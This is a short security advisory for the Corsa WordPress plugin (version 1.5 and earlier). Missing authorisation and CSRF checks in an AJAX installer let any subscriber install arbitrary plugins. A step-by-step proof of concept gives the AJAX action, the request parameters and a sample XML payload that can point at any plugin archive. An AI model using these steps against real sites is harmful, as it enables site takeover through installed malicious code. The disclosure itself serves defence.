Corsa <= 1.5 – Subscriber+ Arbitrary Plugin Installation

Description

The plugin does not have authorisation and CSRF when installing a plugin via an AJAX action, which could allow any authenticated user, such as subscriber to install arbitrary plugins (via an arbitrary archive URL)

Proof of Concept

1. Login as subscriber.
2. Prepare a .zip file containing a .xml file containing payload below, modify as needed. E.g. a malicious user would likely inject a malicious plugin URL instead.

<product>
<product id="corsa" version="1.0"></product>
<extension name="akismet" version="5.0" downloadurl="https://downloads.wordpress.org/plugin/akismet.5.0.zip"></extension>
</product>

3. Send a POST request to:
URL: /wp-admin/admin-ajax.php?action=wr-sample-data-installer
POST task parameter: upload
POST package parameter: the payload.zip file

4. After this, send another POST request to
URL: /wp-admin/admin-ajax.php?action=wr-sample-data-installer
POST task parameter: install_plugin
POST plugin parameter: akismet 

5. After this, the akismet slug will be looked for in the .xml file uploaded previously, and then the plugin will be downloaded, installed and activated.